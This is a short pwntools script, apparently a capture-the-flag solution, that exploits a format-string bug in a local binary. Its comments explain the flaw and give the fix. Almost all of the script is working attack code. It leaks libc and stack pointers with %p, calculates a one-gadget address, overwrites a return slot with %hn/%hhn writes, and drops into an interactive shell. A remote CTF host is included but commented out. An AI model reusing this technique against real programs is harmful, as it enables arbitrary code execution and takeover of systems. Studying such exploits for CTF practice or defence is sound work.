# CTF proof-of-concept script (pwntools) against a local binary "./pwn".
# The program's "food:" prompt passes user input to a printf-style
# formatter, which this script relies on: %p directives leak stack/libc
# pointers and %hn/%hhn directives perform the writes below. That is a
# classic format-string vulnerability; the fix on the program side is to
# never use user input as the format argument (e.g. printf("%s", buf)).
# Every numeric offset in this file (0x20750, 240, 0x45226, the two
# 0x7ffc... stack values) is specific to the target binary, its libc build
# and the stack layout observed during one debugging session; they are not
# portable and are left exactly as the author recorded them.
# NOTE(review): the original file's line structure was flattened when it
# was captured; line breaks below are reconstructed and only whitespace
# differs from the source.
from pwn import *

context(os='linux',arch='amd64')
#need tmux
# Debug level echoes every byte sent/received, handy when the offsets drift.
context.log_level="debug"

# Remote target left commented out; the script runs the local binary.
# p = remote("node4.buuoj.cn", 26443)
p = process("./pwn")
# The "name" buffer is filled with the string "/bin/sh".
p.sendlineafter("Give me your name:", b"/bin/sh")

# Leak two stack values via positional %p directives (args 9 and 11),
# separated by '^' so they can be split on receive.
p.sendlineafter("food:", b'%9$p^%11$p^')
# First leak: derived libc base (author's own offset arithmetic).
libc_base = int(p.recvuntil("^")[10:-1], 16) - 0x20750 - 240 # __libc_start_main
# Second leak: a stack pointer used to locate the target slot.
stack = int(p.recvuntil("^")[:-1], 16)
# Rebase a stack address recorded from a debugger session onto the live leak;
# the two hard-coded 0x7ffc... values only make sense relative to each other.
i_addr = stack - 0x7ffc0bd8af08 + 0x7ffc0bd8ae40
# libc-relative code address the script redirects execution to
# (presumably a one-gadget style address; offset is libc-build specific — confirm).
one = libc_base + 0x45226
print(hex(one))

# Three pointer/value write pairs: each first line sets a 16-bit pointer
# through arg 11, each second line writes a byte or half-word through arg 37.
p.sendlineafter("food:", "%{}p%11$hn".format((i_addr - 0x30 + 4) & 0xffff))
# attach(p)
p.sendlineafter("food:", "%{}p%37$hhn".format(1))
p.sendlineafter("food:", "%{}p%11$hn".format((i_addr - 0x18) & 0xffff))
# attach(p)
p.sendlineafter("food:", "%{}p%37$hn".format(one & 0xffff))
p.sendlineafter("food:", "%{}p%11$hn".format((i_addr - 0x18 + 2) & 0xffff))
# attach(p)
p.sendlineafter("food:", "%{}p%37$hhn".format((one & 0xff0000) // 0x10000))

# Drive the remaining prompts with a harmless value until the loop exits.
# NOTE(review): indentation of the two statements after this loop was lost
# in the captured source; they are placed outside the loop here — confirm.
for i in range(8):
    p.sendlineafter("food:", "1")
# attach(p)
p.sendlineafter("food:", "1")
print(hex(libc_base))
p.interactive()